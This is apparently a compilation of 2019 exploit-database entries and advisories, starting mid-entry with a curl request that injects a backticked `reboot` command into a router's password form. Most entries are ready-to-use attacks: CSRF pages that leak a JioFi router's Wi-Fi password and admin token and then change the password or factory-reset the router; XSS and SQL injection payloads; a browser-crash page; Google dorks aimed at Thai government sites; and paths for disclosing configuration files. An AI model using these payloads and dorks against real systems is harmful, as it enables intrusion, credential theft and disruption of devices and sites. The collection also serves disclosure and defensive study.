    -H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
    --data-binary $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' \
'http://192.168.1.1/boaform/formPasswordSetup'

Mitigation
==========

This issue is fixed in latest firmware as per vendor.

Disclosure: 
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor 
10-Dec-2018 Recived confirmation from vendor regarding fix
05-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE Assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

=====================================================
DoS and gecko reboot in the nokia 8810 4G handset
=====================================================

. contents:: Table Of Content

Overview
========

Title:- DoS and gecko reboot in the nokia 8810 4G handset
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7386
Vendor: HMD Global, Nokia, KaiOS
Products: Nokia 88104G

Tested Version: :  
  Model :- Nokia 8810 4G
  Software : 10.05
  Kai OS Version  : 2,5
  Build Number : 10.05
  Platfirm ver : 48.0.a2
Severity: High--Critical

Advisory ID
============
KSA-Dev-007


About the Product:
==================
Brand Nokia
Developer HMD Global
Manufacturer Foxconn
Operating System :  kaios
Nokia 8110 4G is a Nokia-branded mobile phone developed by HMD Global. It was announced on 25 February 2018 at Mobile World Congress (MWC) 2018 in Barcelona, Spain, as a revival of the original Nokia 8110, which was popularly known as the "Matrix phone" or "banana phone". It runs on an operating system based on KaiOS, and through the company's partnership with Google also features Google services like Maps and Assistant.

Description: 
============

A Denial of Service issue has been discovered in the Gecko  component of KaiOS 2.5 10.05 (platform 48.0.a2) on Nokia 8810 4G devices. When a crafted web page is  visited with the internal browser, the Gecko process crashes with a  segfault. Successful exploitation could lead to the remote code
 execution on the device.

Affected Product Code Base
Nokia 8810 4G - Software : 10.05 , Kai OS Version  : 2,5 ,Build Number : 10.05 ,Platform ver : 48.0.a2


Vulnerability Class:
====================
Buffer Overflow

Attack Type
==========
Remote


Impact Denial of Service
========================
 true


Attack Vectors
==============
To exploit this vulnerability one needs to visit the crafted webpage using inbuilt browser in the device

Affected Component
the Denial of Service issue has been discovered in the the gecko component of the KaiOS used in Nokia 8810 4G, When crafted web page is
visited by internal browser of Nokia the gecko process crash with  segfault


How to Reproduce: (POC):
========================
1. Host the webpage with below contain on the controlled server Eg. 192.168.1.1 as crash.html.

<!DOCTYPE html>
<html>
<body>
<canvas id="canvas" width="500", height="500"> </canvas>
<script>
  var canvas = document.getElementById("canvas");
  var width = canvas.width;
  var height = canvas.height;
  for (var x=0; x < 400; x++){
    var ctx = canvas.getContext("2d");
    for (var i = 0; i < width; i += 10) {
      ctx.moveTo(i, 0);
      ctx.lineTo(i, height);
      ctx.stroke();
    }
  }
</script>
</body>
</html>


2. Now visit the url http://192.168.1.1/crash.html using the inbuilt browser.

3. As soon as page render it cause the buffer overflow in skiaGL component of the gecko and cause gecko to reboot.

Mitigation
==========

Not Available 

Disclosure: 
===========
01-JAN-2019 Discoverd the Vulnerability
01-jan-2018 Reported to Nokia  
02-JAN-2019 Nokia ask to report to the HMD Global,
02-JAN-2019 Reported to HMD Global using info@hmdglobal.com (No Repsonse)
04-JAN-2019 twitted to them (No Reposne)
05-Jan-2019 Requested For CVE-ID
04-FEB-2019: CVE Assigned

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CA20190212-01: Security Notice for CA Privileged Access Manager

Issued: February 12, 2019
Last Updated: February 12, 2019

CA Technologies Support is alerting customers to a potential risk
with CA Privileged Access Manager. A vulnerability exists that can
allow a remote attacker to access sensitive information or modify
configuration. CA published solutions to address the vulnerabilities.

CVE-2019-7392 describes a vulnerability resulting from inadequate
access controls for the components jk-manager and jk-status web
service allowing a remote attacker to access the CA PAM Web-UI
without authentication

Risk Rating

High

Platform(s)

All platforms

Affected Products

CA Privileged Access Manager 3.2.1 and prior releases
CA Privileged Access Manager 3.1.2 and prior releases
CA Privileged Access Manager 3.0.x

How to determine if the installation is affected

Customers may check the version of the product to determine if they
are running a vulnerable release.

Solution

CA Privileged Access Manager 3.2.1 and prior releases:
Update to CA Privileged Access Manager 3.2.2 or later

CA Privileged Access Manager 3.1.2 and prior releases:
Update to CA Privileged Access Manager 3.1.3 or later

CA Privileged Access Manager 3.0.x:
Contact CA support for guidance

References

CVE-2019-7392 - CA Privileged Access Manager jk-manager and jk-status
access

Acknowledgement

CVE-2019-7392 - Bob Brust

Change History

Version 1.0: 2019-02-12 - Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications.

Customers who require additional information about this notice may
contact CA Technologies Support at http://support.ca.com/.

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at vuln <AT> ca.com

Security Notices and PGP key
support.ca.com/irj/portal/anonymous/phpsbpldgpg
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Kevin Kotas
Vulnerability Response Director
CA Technologies Product Vulnerability Response

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.

-----BEGIN PGP SIGNATURE-----
Charset: utf-8

wsFVAwUBXGMTRLlJjor7ahBNAQhVNhAAkYOlhpMYNZL8N8ubUiRHiv6r3DUZi0J3
WnK3eYQLhbr5f2a1SWx0rC4qoItpH9ZguTwTeYzr4vSx12fmL9+yxPg5s8kMIu7G
dhS10gaA+CyTqXc2Rv42y0j1Jp6XR8zPrUqacPSErrXfIOB+iRJPsCSp+pLrCX1W
6AT3N+9P9qhH8q51BBc0dE+BBMK6Hxanj7jp3gvo7Ei9ziHNN5bvNsJkp2CiPbLJ
U8GFM/+3wkcwf+fz7uOy+FEmbpY5RoiGqgjJEqD0fXPhD9TjARoK+Z97QDx2dUyV
JFmnQ3MlXg8KCIoHIoQu6yxPc5NBk/nV/4d7gSAAZKLOZ/bElGpSlTilLGYrgrF3
5PCcBqYuXVdDmLotxf0KpML9Eog+yxfI4YtsFbhmH3gH2T2Ux9sOvkRpD7edyTOR
9dQ3FdUIUYUjvEI3pVXVypqUwUmSoylY4WQQdpnkqmIWZox2eEAdHEFtbedAUCy+
MT5W175gh0Fcq/lRTGOJMCLwo7Dn+FMzy6yoLmiTYz2xZKiPsgaIhf2VelFuGjNi
mgY4D+5UsjRklbrptFxv3DkMJxQKmAfK4+MsBdZ5C/HaJ2CtpysTk7Sky0Ryu853
J716IfB1kTABZfCgK+wxi8N/KsZoCYN5jbEURC8FzmHXaUCkodTiwatLKJ4Q0fC3
/Ght94KD7wM=
=1+K8
-----END PGP SIGNATURE-----

# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687


Description:
cgi-bin/qcmap_web_cgi on  JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices  has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.

1. Create a poc.html and insert

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert(document.domain)</script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>d
</html>

2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .

Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To View Wi-fi Password
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7745

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain the Wi-Fi password by making a cgi-in/qcmap_web_cgi Page=GetWiFi_Setting request and then reading the wpa_security_key field.

POC-
1. Create a view.html and insert

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


2. Send to victim(who is connected to the wifi network).
3. The response gives the current wifi password.
  Example response-

{"Page":"GetWiFi_Setting","Mask":"0","result":"SUCCESS","ssid":"JioFi4_08FE5F","mode_802_11":"11bgn","tx_power":"MID",
"wmm":"Enable","wps_enable":"PushButton","wifi_security":"WPA2PSK","wpa_encryption_type":"AES",
"wpa_security_key":"leakedpassword",".....etc}


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

# Exploit Title: Jiofi 4 (JMR 1140) CSRF To Leak Admin Tokens to change wifi Password or Factory Reset Router  
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7746

Description:

JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices allow remote attackers to obtain an admin token by making a  /cgi-bin/qcmap_auth type=getuser request and then reading the token  field. This token value can then be used to change the Wi-Fi password or perform a factory reset.

POC-

The exploit requires two csrf requests to be sent to the victim(logged to  the web interface) connected to the Jiofi router.

1. First get admin tokens 

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_auth" method="POST">
<input type="hidden" name="type" value="getuser" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


  Example response-

{"super_user_id":"administrator", "oper_user_id":"operator", "end_user_id":"admin", "token":"leakedtokens"}

Choice A)Change wifi password to attacker's choice of the Jiofi 4(JMR 1140) router.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="SetWiFi_Setting" />
<input type="hidden" name="Mask" value="0" />
<input type="hidden" name="result" value="0" />
<input type="hidden" name="ssid" value="JioFi4_08FE5F" />
<input type="hidden" name="mode_802_11" value="11bgn" />
<input type="hidden" name="tx_power" value="HIGH" />
<input type="hidden" name="wmm" value="Enable" />
<input type="hidden" name="wps_enable" value="PushButton" />
<input type="hidden" name="wifi_security" value="WPA2PSK" />
<input type="hidden" name="wpa_encryption_type" value="AES" />
<input type="hidden" name="wpa_security_key" value="Iamhacked" />
<input type="hidden" name="wep_security_key_1" value="0" />
<input type="hidden" name="wep_security_key_2" value="0" />
<input type="hidden" name="wep_security_key_3" value="0" />
<input type="hidden" name="wep_security_key_4" value="0" />
<input type="hidden" name="wep_current_default_key" value="0" />
<input type="hidden" name="channel_mode" value="automatic" />
<input type="hidden" name="channel_selection" value="11" />
<input type="hidden" name="sleep_mode" value="Enable" />
<input type="hidden" name="sleep_mode_timer" value="30" />
<input type="hidden" name="ssid_broadcast" value="Enable" />
<input type="hidden" name="enable_wifi" value="Enable" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Wifi Password changed to Iamhacked

Choice B) Perform Remote Factory Reset

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="type" value="FRST_REAL" />
<input type="hidden" name="token" value="leakedtokens" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

The router reboots to default settings.


Note- I believe this to work in all other jio routers viz. Jio JMR 540, Jiofi M2 as all share similar web interface. I have not confirmed this.

####################################################################

# Exploit Title : Rukovoditel Project Management CRM 2.4.1 - XSS Vulnerability (DOM BASED)
# Author [ Discovered By ] : Mehmet EMIROGLU
# Date : 29/01/2019
# Vendor Homepage : https://www.rukovoditel.net/
# Software Link : https://sourceforge.net/projects/rukovoditel/
# Affected Versions : 2.4.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# CVE : 2019-7541
# Sofrware Description : Rukovoditel is a free web-based open-source
project management
  application. A far cry from traditional applications, Rukovoditel gives
  users a broader and extensive approach to project management. Its
  customization options allow users to create additional entities, modify
  and specify the relationship between them, and generate the necessary
reports.

####################################################################

# Impact :
*********

* This web application called as Rukovoditel Project Management CRM 2.4.1
version.
* first of all, delete the value string from the URL
(...module=users%2flogin)
* after, add the XSS code I've given below to the end of the URL.
* The proof will be the picture below.
* https://i.hizliresim.com/6aydM7.jpg

####################################################################

# PoC :
****************************
* XSS Code : "><img src=x
onerror=document.body.innerHTML=location.hash>#"><img src=x
onerror=prompt(123456789)>
* Value : users%2flogin
* Get Request : http://localhost/[PATH]/index.php?module=users%2flogin
* URL : http://localhost/rukovoditel/index.php?module="><img src=x
onerror=document.body.innerHTML=location.hash>#"><img src=x
onerror=prompt(123456789)>

####################################################################

# -*- coding: utf-8 -*-
# Exploit Title: NetworkSleuth 3.0 - Denial of Service (PoC)
# Date: 12/02/2019
# Author: Alejandra SA!nchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Version: 3.0.0.0
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "NetworkSleuth.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NetworkSleuth.exe 
# 4.- Go to Register > Enter Registration Code...
# 5.- Paste clipboard in 'Name' field
# 6.- Write '1234' in 'Key' field
# 7.- Clic on button -> Ok
# 8.- Crashed

buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

####################################################################

# Exploit Title: PilusCart 1.4.1 - 'send' SQL Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/pilus/
# Software Link: https://sourceforge.net/projects/pilus/
# Version: 1.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: PilusCart is a web-based online store management system, written in PHP scripting language as the most popular web programming language today. To store the data, PilusCart uses MySQL relational database management system.

####################################################################

# Vulnerabilities / Impact
# This web application called as PiLuS 1.4.1 version.
# Switch to the http://localhost/PiLUS/read-apa-itu-pdo
  fill in the red-colored parts that I have given in the link
  https://i.hizliresim.com/MV11La.jpg
  Get in with the burp suite. and add the payload
  at the end of the request to the attack pattern.

####################################################################

# POC - SQL (Boolean Based String)
# Parameters : send
# Attack Pattern : RLIKE (case when  7488715=7488715 then
0x656d69726f676c75 else 0x28 end)
# POST Request :
http://localhost/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim
RLIKE
(case when  7488715=7488715 then 0x656d69726f676c75 else 0x28 end)

#############################################################

# Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Software Information Link : bizpotential.com/overview.php
# Software Affected Version : 8.6.2 and all previous versions.
# Software Price : 100$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-592 - Authentication Bypass Issues
# CXSecurity Reference Link  : cxsecurity.com/ascii/WLB-2018090088

#############################################################

BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability

#############################################################

# Google Dorks : 
*****************

inurl:''/ewtadmin/'' site:go.th

inurl:''/main.php?filename='' site:go.th

inurl:''/ewtadmin/ewt/ccs/''

intext:''(c) Copyright 2007 - BizPotential.com - All Rights Reserved.''

intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''

#############################################################

# Admin Control Panel Paths :
***************************

/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php

#############################################################

# SQL Injection Exploit : 
***********************

/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]

/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]

/more_news.php?offset=[SQL Injection]

/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]

#############################################################

# Webboard Exploit Bypass : 
**************************

/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard

# Webboard Directory Path : 
**************************

/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

/index_question.php?wcad=5&t=1&filename=webboard

ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard

#############################################################

# Example SQL Database Errors => 
********************************
SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y'
ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near '-20,20' at line 1

SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve =
'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) 
or (n_date_start = '' and n_date_end = '')) ORDER BY n_date 
DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds 
to your MySQL server version for the right syntax to use near '\\\',20' at line 1

#############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#############################################################

####################################################################

# Exploit Title : F3-CMS FatFreeFramework 0.0.1 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : f3cms.ca ~ fatfreeframework.com
# Software Download Link : github.com/vijinho/f3-cms/archive/dev-master.zip
# Software Information Link : github.com/vijinho/f3-cms
github.com/vijinho/f3-cms/blob/dev-master/docs/DATABASE.md
# Software Version : 0.0.1 and higher versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
F3 CMS is a Content Management System.

The F3 CMS framework is a secure and robust, PHP-based coding platform. 

####################################################################

# Impact :
***********
F3-CMS FatFreeFramework 0.0.1 and higher versions configuration file may potentially 

disclose sensitive information to remote attackers.

The configuration file that F3-CMS FatFreeFramework 0.0.1 stored in folder /data/db/sql/.

HTTP requests consisting of a single character will cause the software to 

disclose sensitive configuration information, including the password/database to the administrative web interface.

This file is installed, by default, with world readable and possibly world writeable permissions enabled. 

This may have some potentially serious consequences as the configuration 

file also stores password information in plain text.

This issue occurs because access controls on configuration files are not properly set.

An attacker can exploit this issue to retrieve potentially sensitive information. 

Attackers can access config file via URL request. This may aid in further attacks.

####################################################################

# Database Disclosure Exploit :
**************************
/data/db/sql/audit-archive.sql

/data/db/sql/create.sql

/data/db/sql/phinx.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

####################################################################

# Exploit Title : Unvo PhalconPHP 1.x Database Config Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : phalconphp.com
# Software Download Link : github.com/phalcon/invo/archive/master.zip
# Software Information Link : invo.phalconphp.com
# Software Affected Version : Free Version and 1.x
# Software Technical Requirements :
PHP => 5.4 and  MySQL => 5.1.5
Apache Web Server with mod_rewrite enabled or Nginx Web Server
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Phalcon PHP is a web framework delivered as a C extension providing 

high performance and lower resource consumption.

####################################################################

# Impact :
***********
Invo PhalconPHP configuration file may potentially disclose sensitive information to remote attackers.

The configuration file that Invo PhalconPHP stored in /app/config/config.ini and /schemas/invo.sql

HTTP requests consisting of a single character will cause the software to 

disclose sensitive configuration information, including the password/database to the administrative web interface.

This file is installed, by default, with world readable and possibly world writeable permissions enabled. 

This may have some potentially serious consequences as the configuration 

file also stores password information in plain text.

This issue occurs because access controls on configuration files are not properly set.

An attacker can exploit this issue to retrieve potentially sensitive information. 

Attackers can access config file via URL request. This may aid in further attacks. 

####################################################################

# Database Configuration File Disclosure Exploit :
*******************************************
/app/config/config.ini

[database]
adapter  = Mysql
host     = localhost
username = root
password =
dbname   = invo
charset  = utf8

[application]
controllersDir = app/controllers/
modelsDir      = app/models/
viewsDir       = app/views/
pluginsDir     = app/plugins/
formsDir       = app/forms/
libraryDir     = app/library/
baseUri        = /

# Database Disclosure Exploit :
***************************
/schemas/invo.sql

-- MySQL dump 10.13  Distrib 5.1.50, for apple-darwin10.4.0 (i386)
--
-- Host: 127.0.0.1    Database: invo
-- ------------------------------------------------------
-- Server version  5.1.50

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

####################################################################

# Exploit Title : Ispirithalaya Hospital Management System 0.1.2 Database Config Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : freeehospital.com
# Software Download Link : sourceforge.net/projects/ispirithalaya/files/latest/download
# Software Information Link : sourceforge.net/projects/ispirithalaya/
# Software Version : 0.1.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
Ispirithalaya system has e channeling, checking , lab test, reservation. 

It is written by zend php framework and mysql db. doctors and patients 

can log the system and chat. It has payment gateway integration.

####################################################################

# Impact :
***********
Ispirithalaya Hospital Management System 0.1.2 [ and other versions ] configuration file may potentially 

disclose sensitive information to remote attackers.

The configuration file that Ispirithalaya Hospital Management System 0.1.2 stored in /application/configs/application.ini

HTTP requests consisting of a single character will cause the software to 

disclose sensitive configuration information, including the password/database to the administrative web interface.

This file is installed, by default, with world readable and possibly world writeable permissions enabled. 

This may have some potentially serious consequences as the configuration 

file also stores password information in plain text.

This issue occurs because access controls on configuration files are not properly set.

An attacker can exploit this issue to retrieve potentially sensitive information. 

Attackers can access config file via URL request. This may aid in further attacks. 

####################################################################

# Database Config Disclosure Exploit :
*********************************
/application/configs/application.ini

resources.db.adapter =
resources.db.params.host =
resources.db.params.username = 
resources.db.params.password = 
resources.db.params.dbname = 

/data/db/ispirithalaya-data.sql

-- phpMyAdmin SQL Dump
-- version 3.3.9
-- phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Oct 18, 2011 at 05:21 PM
-- Server version: 5.5.8
-- PHP Version: 5.3.5

/data/db/ispirithalaya.sql

- phpMyAdmin SQL Dump
-- version 3.3.10deb1
-- phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Oct 15, 2011 at 11:31 AM
-- Server version: 5.1.54
-- PHP Version: 5.3.5-1ubuntu7.2

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################